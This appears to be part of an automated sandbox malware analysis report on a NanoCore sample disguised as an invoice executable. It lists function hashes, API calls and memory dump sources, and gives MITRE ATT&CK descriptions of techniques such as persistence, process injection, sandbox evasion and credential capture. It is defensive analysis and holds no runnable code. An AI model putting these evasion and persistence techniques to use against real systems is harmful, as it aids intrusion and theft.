Instruction Fuzzy Hash: 051100B69042088FDB14CFAAD444ADEBBF4EB48320F10856EE919A7600C775A949CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01BF2261, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,01BF20C1,00000800,00000000,00000000), ref: 01BF22D2

Memory Dump Source

Source File: 00000016.00000002.939752325.0000000001BF0000.00000040.00000001.sdmp, Offset: 01BF0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 87ba2f0737de5b0eaba1cbdecba0b96d52a4081a4dd2110e14f6d9e844a311d1
Instruction ID: 453a7a83f491984a16b6e793c756c8b95fe2fddfb26a9791799290a4866473de
Opcode Fuzzy Hash: 87ba2f0737de5b0eaba1cbdecba0b96d52a4081a4dd2110e14f6d9e844a311d1
Instruction Fuzzy Hash: 3B111FBAD002098FDB14CFAAC444BDEFBF4AB48324F14856ED919A7600C379A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01BF1FE0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 01BF2046

Memory Dump Source

Source File: 00000016.00000002.939752325.0000000001BF0000.00000040.00000001.sdmp, Offset: 01BF0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b0f455ceaa5bf6fbe6f7ea8cec2044292e751c2b7833c0b62adae136fe2a4420
Instruction ID: 1e5a5a13b8b3f748828e580daeecf43a029010dc732b71a39797047a753a93b3
Opcode Fuzzy Hash: b0f455ceaa5bf6fbe6f7ea8cec2044292e751c2b7833c0b62adae136fe2a4420
Instruction Fuzzy Hash: B11110B6C002098FDB14CFAAC844BDEFBF4EB88224F10845ED919B7610C379A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01B7D200, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.938588815.0000000001B7D000.00000040.00000001.sdmp, Offset: 01B7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81c80e6204e99d8fe5aaf1abdd90235e3ddbb93c788b27eac74fd4493a8c3210
Instruction ID: 7c1abfb86910d32b3171cd169d9497e50dedfaf9c2947ecb967135fc3a7d76da
Opcode Fuzzy Hash: 81c80e6204e99d8fe5aaf1abdd90235e3ddbb93c788b27eac74fd4493a8c3210
Instruction Fuzzy Hash: 23210372504240DFDB09DF94D9C4B26BB65FF88364F2486ADED051B246C33AD81BCBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01B7D4C8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.938588815.0000000001B7D000.00000040.00000001.sdmp, Offset: 01B7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 516e14d39c64388880edd6b8f442271f90f9c44ca4f02f1f09eccd097e95070a
Instruction ID: d5c8ad2084630358c2ef580534558b65a95c84673e2ef7865a16d259e1b5dd24
Opcode Fuzzy Hash: 516e14d39c64388880edd6b8f442271f90f9c44ca4f02f1f09eccd097e95070a
Instruction Fuzzy Hash: 98212572504240EFDB19DF54D9C0B66BF66FF88368F2486ADE80A0B207C336D856C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01B7D1FB, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.938588815.0000000001B7D000.00000040.00000001.sdmp, Offset: 01B7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080d7d6311979cb628b626afb9c5a1a9eaef433d3388d178d81fdc19ba018a6a
Instruction ID: 51a8b3a216edd7e9e304c8365b4a88ee0c650eb27fbf22334c9be7c4aa3cf91e
Opcode Fuzzy Hash: 080d7d6311979cb628b626afb9c5a1a9eaef433d3388d178d81fdc19ba018a6a
Instruction Fuzzy Hash: DB219D76504280DFDB06CF54D9C4B16BF71FB88320F28C2A9DC040A656C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01B7D4C3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.938588815.0000000001B7D000.00000040.00000001.sdmp, Offset: 01B7D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d1d1512c5009ec7e133a77178c84f5ca9ae226b41290c1d563dc625792c783
Instruction ID: 191bd0d12640edf060b9850a09fd265d09e7b58b62ec900469e807a7a2395137
Opcode Fuzzy Hash: 35d1d1512c5009ec7e133a77178c84f5ca9ae226b41290c1d563dc625792c783
Instruction Fuzzy Hash: 8C11AC76504280DFDB16CF54D9C4B16BF72FB88324F2886A9D8090B656C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report CN-Invoice-XXXXX9808-19011143287989.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre